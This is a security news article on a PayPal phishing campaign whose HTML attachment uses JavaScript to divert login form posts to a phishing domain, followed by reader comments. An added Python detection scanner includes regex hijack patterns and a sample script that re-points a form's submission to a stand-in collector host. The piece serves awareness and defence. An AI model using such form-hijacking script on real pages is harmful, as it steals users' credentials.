Think hovering your mouse over the URL will save you? Think again!

Phishers using JavaScript redirect to steal PayPal credentials

David Bisson

Regular readers are familiar with our ongoing coverage of phishing attacks.

Recently, we reported on an Apple ID SMS-based phishing scam, and described how tax-related phishing attacks surged by 400 percent this year.


The continued success of these and other phishing campaigns reveals a persistent deficit of security awareness among users. Indeed, as we shared in an article earlier in 2016, Tripwire found that more than half (52 percent) of respondents for a survey conducted at RSA were “not confident” in their ability to spot a phishing attack.


That’s troubling news. And as attacks continue to grow in sophistication, it’ll only get harder to spot a phish.

Case in point, phishers are now using a hidden JavaScript redirect method to steal unsuspecting PayPal users’ login information.

On Monday, UK malware researcher @dvk01uk came across the phishing campaign.

Pieter Arntz of Malwarebytes explains that fraudsters in these particular attacks are using JavaScript to send users to a legitimate PayPal site while sending their credentials to a different domain that hosts a phishing page:

“The javascript runs as soon as the page (HTML attachment) is loaded and intercepts all posts to and diverts them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.”

This sophisticated technique negates a common anti-phishing tactic: hovering over a URL to confirm it points to where you would expect it to point.
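
For defenders filtering mail, the behaviour described above can be looked for statically in an HTML attachment: a form whose visible action names one host while inline script hooks the submission and names another. The Python below is an added example, not code from the article or from the researchers it quotes; the patterns, function names and sample documents (using reserved example domains) are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic: script constructs that re-point or intercept a form submission.
HIJACK = re.compile(r"\.action\s*=[^=]|setAttribute\(\s*['\"]action['\"]|"
                    r"addEventListener\(\s*['\"]submit['\"]|\.onsubmit\s*=", re.I)
URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)

def host(url):
    return (urlparse(url).hostname or "").lower()

class AttachmentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.form_hosts, self.scripts, self.in_script = set(), [], False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_hosts.add(host(attrs.get("action") or ""))
            self.scripts.append(attrs.get("onsubmit") or "")
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        self.in_script = False  # inside <script> the only end tag reported is </script>

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)

def scan_attachment(html):
    """Flag forms whose scripts hook submission and name a host other than the action's."""
    p = AttachmentScanner()
    p.feed(html)
    p.close()
    js = "\n".join(p.scripts)
    form_hosts = p.form_hosts - {""}
    foreign = sorted({host(u) for u in URL.findall(js)} - form_hosts - {""})
    hijack = bool(HIJACK.search(js))
    return {"form_hosts": sorted(form_hosts), "foreign_hosts": foreign,
            "hijack": hijack, "suspicious": bool(form_hosts and hijack and foreign)}

# Constructed samples with reserved example domains (not taken from the campaign).
FORM = '<form id="f" action="https://www.login.example/signin" method="post"></form>'
SAMPLE_HIJACK = FORM + ('<script>document.getElementById("f").onsubmit = function () {'
                        ' this.action = "https://collector.example.net/p"; };</script>')
SAMPLE_BENIGN = FORM + '<script>console.log("page loaded");</script>'
```

Calling `scan_attachment(SAMPLE_HIJACK)` reports `collector.example.net` as a foreign host and marks the file suspicious, while `SAMPLE_BENIGN` passes. Static matching like this misses obfuscated or dynamically built script, so a clean result is inconclusive rather than a sign the attachment is safe.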

Fortunately, users can protect themselves against this phishing technique, though for how long remains to be seen. The malware researcher @dvk01uk expands upon this point in a blog post:

“The only saving grace with this particular phishing attack is that the phishing page is a HTML page / form that they tell you to open on your computer and not a link to a website. The advice we always give to NOT open any attachments to emails and definitely do not fill in html form attachments should protect you. But once a phisher puts this onto a website with a plausible & believable URL, then all bets are off and it will be almost impossible to detect the phish. This is very worrying.”

Fortunately, PayPal offers users the ability to enable two-step verification, which will help protect their accounts even in the event someone compromises users’ passwords.

David Bisson is an infosec news junkie and security journalist. He works as Contributing Editor for Graham Cluley Security News and Associate Editor for Tripwire's "The State of Security" blog.

4 comments on “Think hovering your mouse over the URL will save you? Think again!”

  1. drsolly

    I've been using a non-html mail client since 1995.

  2. dqfozzie

    PayPal are their own worst enemy when it comes to phishing. They proclaim they are anti-phishing but have links on their 'Your … statement is available' emails that look suspicious. I check them out because I'm a security professional but the average person either tires of this process or doesn't know how to, to begin with. Their users have no confidence that they are safe. Best practice is to give no link at all and get the user to go to a known safe bookmark or type it in from scratch. I've emailed them. Guess how much response I got :-(

  3. vooboobolly

    Paypal 2FA is not available in all countries! Why not?

  4. graphicequaliser

    I always login to the site by typing the url, check the SSL padlock before I login, and then login to see a statement or whatever. I have the motto, "If something is running on your computer that is not part of the OS, then you really ought to know what it does and why it is running." Also, "Don't install something because you've been prompted to. Only install stuff you want." That, and MJ Registry Watcher have kept me safe for many years!
